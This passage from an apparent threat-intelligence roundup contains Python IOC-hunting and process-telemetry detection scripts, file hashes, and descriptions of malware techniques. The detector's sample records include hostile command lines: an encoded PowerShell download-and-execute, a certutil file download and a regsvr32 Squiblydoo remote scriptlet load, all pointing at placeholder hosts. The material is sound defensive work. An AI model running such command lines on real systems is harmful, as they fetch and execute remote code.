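    parts.append(_ci(re.escape(template[pos:])))
    return re.compile("^" + "".join(parts) + "$")


def refang(indicator):
    """Undo the "[.]" defanging used in the post."""
    return indicator.replace("[.]", ".")


def build_matchers():
    nets, domains, host = [], [], []
    for family, raw in NETWORK_IOCS:
        indicator = refang(raw)
        try:  # a bare address becomes a /32 network
            nets.append((family, ipaddress.ip_network(indicator, strict=False)))
        except ValueError:  # not an address or CIDR, so a domain
            domains.append((family, indicator.lower()))
    for family, kind, template, value in HOST_IOCS:
        full = template if value is None else template + "\\" + value
        host.append((family, kind, template_to_regex(full)))
    return nets, domains, host


def hunt(events):
    """Sorted (event id, family) pairs for events that hit an indicator. An event is a
    dict with "id", "kind" (registry, file, dns, network) and "target" (registry value
    path, file path, queried name or destination IP)."""
    nets, domains, host = build_matchers()
    hits = set()
    for ev in events:
        target = ev["target"]
        if ev["kind"] == "network":
            addr = ipaddress.ip_address(target)
            hits.update((ev["id"], fam) for fam, net in nets if addr in net)
        elif ev["kind"] == "dns":
            name = target.lower().rstrip(".")
            hits.update((ev["id"], fam) for fam, dom in domains
                        if name == dom or name.endswith("." + dom))
        else:
            hits.update((ev["id"], fam) for fam, kind, rx in host
                        if kind == ev["kind"] and rx.match(target))
    return sorted(hits)


# Constructed sample telemetry, Sysmon-style; not real data.
SAMPLE_EVENTS = [
    {"id": 1, "kind": "registry", "target": r"HKLM\SYSTEM\ControlSet001\Services\K7Q2M9X1\ImagePath"},
    {"id": 2, "kind": "registry", "target": r"HKLM\SYSTEM\ControlSet001\Services\Tcpip\ImagePath"},
    {"id": 3, "kind": "file", "target": r"C:\Windows\SysWOW64\qhdkzpwr"},
    {"id": 4, "kind": "file", "target": r"C:\Windows\SysWOW64\kernel32.dll"},
    {"id": 5, "kind": "file", "target": r"C:\Users\alice\AppData\Local\Temp\abc1F2E.tmp"},
    {"id": 6, "kind": "registry", "target": r"HKU\S-1-5-21-1111-2222-3333-1001"
                                            r"\Software\Microsoft\Windows\CurrentVersion\Run\remoteaccess"},
    {"id": 7, "kind": "dns", "target": "magiobi.myq-see.com"},
    {"id": 8, "kind": "network", "target": "172.217.197.101"},  # inside the /31
    {"id": 9, "kind": "network", "target": "172.217.197.102"},  # just outside it
    {"id": 10, "kind": "dns", "target": "www.wardia.com.pe"},    # subdomain of an IOC
]

if __name__ == "__main__":
    for event_id, family in hunt(SAMPLE_EVENTS):
        print("event %d matches a %s indicator; triage before acting" % (event_id, family))
```

Running it reports events 1, 3, 5, 6, 7, 8 and 10 and stays silent on the Tcpip service, kernel32.dll and the address one past the /31. Feeding real telemetry means mapping your sensor's registry and file event fields onto the "kind" and "target" keys; if your sensor logs HKCU keys differently from Sysmon, adjust the "<HKCU>" expansion.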

File Hashes

10f75e4e6204c4215d8047e9f83e00773a2284b04ff5aab7fbc236e919fc12e9 1ea8ae69eb42468750338bb04cc79e8bbd2236e99c2fbf7f125de412e8cdb646 23e13139b833a414448ae656c380c264d11e5fb0227b0e12e41cc5adc10fe9e9 2d016bb33f995698e9e525b03512dd3200a072a950b50e94f4f3de9ff90d6445 34f21a49272f624f497acb323a6df3ec6e89088bda108f909adcfa2846665bd5 3a97337036a588e085c1f10e8f792c43e67379edb6de2a62686eacb65ac3fc84 49d04a0ed478b4053657628d9a88e07b02718cca6541a223f13244a65a2c3904 4a9eed59a71750a9a6b8b34b3f1d03adad982177419bea9baa70e13425551462 4f6d64664580bacb5b28d314b2814fbcdd19a9aa1fbe8a10cd7faaa2bb63cdf4 61931b4ebafb6a97880d044bf6d4bb36b393802bb91b520ee67df67dfdaaabe9 70973f1f044e7fb95562fc81e556139bf9a686c18dd25ff2c1fb37a0a828e8fa 8d395656288dbc0f038ebfe537fb603975e5c9a631e5bc9d0d2f26697ff7124d 90aa60078efd0531575251e576f8fa0fb57432f9c77151ed60db5d0af864b71f 9771356e41636b0e3da22ba6601a9e3bc241ea9564f7ebf69c38d2850e68f965 9fa3c2548e95641795c633ad21af14c37bc4eb45ae7c915c7f36b2d1dae632a0 a121870fb766b6bbee682ad7b2980fa6a9f8d5e3196e6b99575ac14f998ab67d a5b7b3d636b5edc5fc8c66f114d9056af27ada565023d1da7ccc8bd003cbc92f b40b7e83e298fa903beb99e73a3dfa815590ef5eda2b2992f9a2c4039bcde339 cc58728510132994e3711b73422259a4d655d3685bd49865d36287c5578ecc8b ce920e9f2fc887bb90b22a11e9bacf4c683a635f8e6cabacc0273403c77de0cd d17cf7c62851a60933d038d70c00b0a3b4ec631f8f87b5e2c0913d22f5ddb494 db1a25b0bfbe7ebe00261719ae07d4e5ceac5d00be2a3100f297093d7ddac5c1 e21ec7fa13f35c42eb42a16242614b37f853f9ad823233c4507eb303dca9257b f20a22823274fe7c6facfe45cf72dcd045843d170dcc184282b02f1d182bb08e

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection: AMP, ThreatGrid (images omitted). MITRE ATT&CK technique map (image omitted).




Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
Dealply adware detected - (13646)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Excessively long PowerShell command detected - (5703)
A PowerShell command with a very long command-line argument, which may indicate an obfuscated or encoded script, has been detected. PowerShell is an extensible Windows scripting language present by default on all supported versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats; base64-encoded (-EncodedCommand) and string-concatenated payloads are the usual reason for the unusually long command line. Long but legitimate command lines from management and installer scripts do occur, so the length threshold should be tuned against the environment's baseline.
CVE-2019-0708 detected - (3105)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption (a use-after-free in the RDP kernel driver) which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered before authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Process hollowing detected - (2018)
Process hollowing is a technique used by some programs to avoid static analysis and to run under the name of a legitimate executable. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then launches a legitimate child process in a suspended state, unmaps (hollows out) the child's original image from memory, writes its own unpacked code in its place, points the child's main thread at the new entry point, and resumes it. The result is a process whose on-disk image looks legitimate while the code executing inside it belongs to the malware.
Squiblydoo application whitelist bypass attempt detected. - (982)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe, a signed Microsoft binary, to load scrobj.dll and execute a COM scriptlet (.sct) hosted on an attacker-controlled server, so that the script content runs without ever being written to disk as an executable.
Installcore adware detected - (360)
InstallCore is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
Gamarue malware detected - (190)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
Kovter injection detected - (173)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is also file-less malware, meaning its malicious payload is stored inside the Windows registry and injected directly into memory using PowerShell rather than loaded from a file on disk. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Certutil.exe is downloading a file - (123)
The certutil.exe utility has been detected downloading a file (its -urlcache option will fetch an arbitrary URL), after which the downloaded file was executed and behaved suspiciously. The normal usage of certutil.exe involves managing certificates and certificate stores. Attackers use this signed, built-in utility to download additional malicious payloads without dropping a downloader of their own.
IcedID malware detected - (76)
IcedID is a banking Trojan. It uses both web browser injection and browser redirection to steal banking and/or other financial credentials and data. The features and sophistication of IcedID demonstrate the malware author's knowledge and technical skill for this kind of fraud, and suggest the authors have previous experience creating banking Trojans. IcedID has been observed being installed by Emotet or Ursnif. Systems infected with IcedID should also be scanned for additional malware infections.
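Three of the signals above (an excessively long or encoded PowerShell command line, certutil.exe fetching a URL, and the regsvr32.exe/scrobj.dll Squiblydoo pattern) can be checked directly against process-creation telemetry. The Python below is an added example and is not Cisco AMP's detection logic: the rule names, the 512-character length threshold and the Sysmon-style record layout are assumptions, and the records are constructed (URLs use the reserved .invalid top-level domain). It also decodes the -EncodedCommand argument, since the decoded script is what an analyst actually wants to read.

```python
import base64
import re

LONG_CMDLINE = 512  # assumed threshold; set it from your environment's baseline

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
ENCODED_ARG = re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
CERTUTIL_DL = re.compile(r"(?i)-urlcache\b.*https?://")
SQUIBLYDOO = re.compile(r"(?i)/i:\S*https?://\S+.*\bscrobj\.dll\b")


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Script hidden behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(record):
    """Names of the rules a process-creation record triggers."""
    image = image_name(record["image"])
    cmd = record["cmdline"]
    hits = []
    if image in ("powershell.exe", "pwsh.exe"):
        if len(cmd) > LONG_CMDLINE:
            hits.append("long_powershell_cmdline")
        if decode_encoded_command(cmd) is not None:
            hits.append("powershell_encoded_command")
    elif image == "certutil.exe" and CERTUTIL_DL.search(cmd):
        hits.append("certutil_download")
    elif image == "regsvr32.exe" and SQUIBLYDOO.search(cmd):
        hits.append("squiblydoo_regsvr32")
    return hits


def scan(records):
    """Sorted (record id, rule name) pairs over a batch of records."""
    return sorted((r["id"], rule) for r in records for rule in evaluate(r))


def encode_ps(script):
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample records (not real telemetry); URLs use the reserved .invalid TLD.
SAMPLE_RECORDS = [
    {"id": 1, "image": PS, "cmdline": "powershell.exe -nop -w hidden -enc "
     + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')")},
    # character-by-character string concatenation, an obfuscation that inflates the command line
    {"id": 2, "image": PS, "cmdline": "powershell.exe -c \""
     + "+".join("'%s'" % c for c in "Invoke-Expression" * 20) + "\""},
    {"id": 3, "image": PS, "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"},
    {"id": 4, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://example.invalid/p.exe C:\\Users\\Public\\p.exe"},
    {"id": 5, "image": r"C:\Windows\System32\certutil.exe", "cmdline": "certutil.exe -verify C:\\certs\\server.cer"},
    {"id": 6, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://example.invalid/x.sct scrobj.dll"},
    {"id": 7, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32.exe /s \"C:\\Program Files\\Vendor\\vendor.dll\""},
]

if __name__ == "__main__":
    for record_id, rule in scan(SAMPLE_RECORDS):
        print("record %d: %s" % (record_id, rule))
    print("decoded:", decode_encoded_command(SAMPLE_RECORDS[0]["cmdline"]))
```

Records 3, 5 and 7 are the controls: a normal script invocation, a certificate check and a local DLL registration produce no alert. The long-command-line rule is the noisiest of the three in practice, which is why the threshold is a named constant rather than a magic number.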
